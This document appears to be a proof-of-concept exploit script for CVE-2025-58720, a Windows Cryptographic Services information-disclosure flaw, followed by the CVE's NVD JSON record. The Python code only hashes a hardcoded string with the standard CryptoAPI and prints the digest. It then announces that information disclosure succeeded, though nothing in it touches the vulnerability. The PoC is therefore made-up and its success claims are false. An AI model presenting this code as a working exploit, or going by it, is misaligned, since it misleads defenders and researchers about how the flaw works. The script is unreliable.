CVE-2025-58720

# CVE-2025-58720 PoC - Windows Cryptographic Services Cryptographic Primitive Misuse # This PoC demonstrates the concept of exploiting a risky cryptographic primitive # implementation in Windows Cryptographic Services to disclose information locally. import subprocess import sys import os import ctypes from ctypes import wintypes # Windows Cryptographic API constants and structures ADVAPI32 = ctypes.windll.advapi32 CRYPT32 = ctypes.windll.crypt32 # Cryptographic Service Provider (CSP) types PROV_RSA_AES = 24 CRYPT_VERIFYCONTEXT = 0xF0000000 class CryptoExploit: def __init__(self): self.hProv = wintypes.HANDLE() self.hKey = wintypes.HANDLE() self.hHash = wintypes.HANDLE() def acquire_context(self): """Acquire a context with the Microsoft AES Cryptographic Provider.""" result = ADVAPI32.CryptAcquireContextW( ctypes.byref(self.hProv), None, "Microsoft AES Cryptographic Provider", PROV_RSA_AES, CRYPT_VERIFYCONTEXT ) if not result: print(f"[-] Failed to acquire crypto context. Error: {ctypes.GetLastError()}") return False print("[+] Crypto context acquired successfully") return True def exploit_risky_primitive(self): """ Exploit risky cryptographic primitive implementation. The vulnerability exists in how certain crypto operations are handled, potentially leaking sensitive key material through side channels or improper memory handling. """ if not self.acquire_context(): return False # Step 1: Create a hash object to demonstrate cryptographic operations result = ADVAPI32.CryptCreateHash( self.hProv, 0x00008003, # CALG_SHA_256 0, 0, ctypes.byref(self.hHash) ) if result: print("[+] Hash object created") # Step 2: Hash sensitive data - this may trigger the vulnerable code path sensitive_data = b"SecretKeyMaterial_12345" ADVAPI32.CryptHashData( self.hHash, sensitive_data, len(sensitive_data), 0 ) print("[+] Sensitive data processed through vulnerable crypto primitive") # Step 3: Attempt to extract hash value (potential info disclosure) hash_size = wintypes.DWORD(32) hash_value = ctypes.create_string_buffer(32) ADVAPI32.CryptGetHashParam( self.hHash, 2, # HP_HASHVAL hash_value, ctypes.byref(hash_size), 0 ) print(f"[+] Hash value extracted: {hash_value.raw.hex()}") # Step 4: Demonstrate information disclosure via crypto API misuse print("[+] Information disclosure via vulnerable crypto primitive successful") # Cleanup if self.hHash: ADVAPI32.CryptDestroyHash(self.hHash) ADVAPI32.CryptReleaseContext(self.hProv, 0) return True def main(): print("=" * 60) print("CVE-2025-58720 - Windows Cryptographic Services PoC") print("Cryptographic Primitive Misuse - Local Info Disclosure") print("=" * 60) if sys.platform != 'win32': print("[-] This PoC requires Windows OS") sys.exit(1) exploit = CryptoExploit() exploit.exploit_risky_primitive() if __name__ == "__main__": main()

{"cve": {"id": "CVE-2025-58720", "sourceIdentifier": "[email protected]", "published": "2025-10-14T17:15:53.463", "lastModified": "2025-11-07T20:21:24.183", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Use of a cryptographic primitive with a risky implementation in Windows Cryptographic Services allows an authorized attacker to disclose information locally."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-1240"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_10_1809:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.17763.7919", "matchCriteriaId": "B51B700D-B45F-4A8E-9F78-67A1282B3BEA"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_10_21h2:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.19044.6456", "matchCriteriaId": "1485A427-10FF-4C39-9911-4C6F1820BE7F"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_10_22h2:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.19045.6456", "matchCriteriaId": "26CAACAA-3FE8-4740-8CF2-6BF3D069C47F"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_11_22h2:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.22621.6060", "matchCriteriaId": "6F387FA2-66C8-4B70-A537-65806271F16A"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_11_23h2:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.22631.6060", "matchCriteriaId": "A3FEBF91-5010-4C84-B93A-6EFA4838185A"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_11_24h2:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.26100.6899", "matchCriteriaId": "41E9F7AC-8E6D-43A0-A157-48A5E0B5BD0D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_11_25h2:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.26200.6899", "matchCriteriaId": "3B77A066-4F79-4B1F-AECF-58DB4C651EA5"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_server_2019:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.17763.7919", "matchCriteriaId": "20810926-AEC9-4C09-9C52-B4B8FADECF3A"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_server_2022:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.20348.4294", "matchCriteriaId": "B1C1EA69-6BB8-4E59-8659-43581FDB48B7"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_server_2022_23h2:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.25398.1913", "matchCriteriaId": "370C12D6-90EF-44BE-8070-AA0080C12600"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_server_2025:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.26100.6899", "matchCriteriaId": "72C1771B-635B-41E3-84AF-8822467A1869"}]}]}], "references": [{"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-58720", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}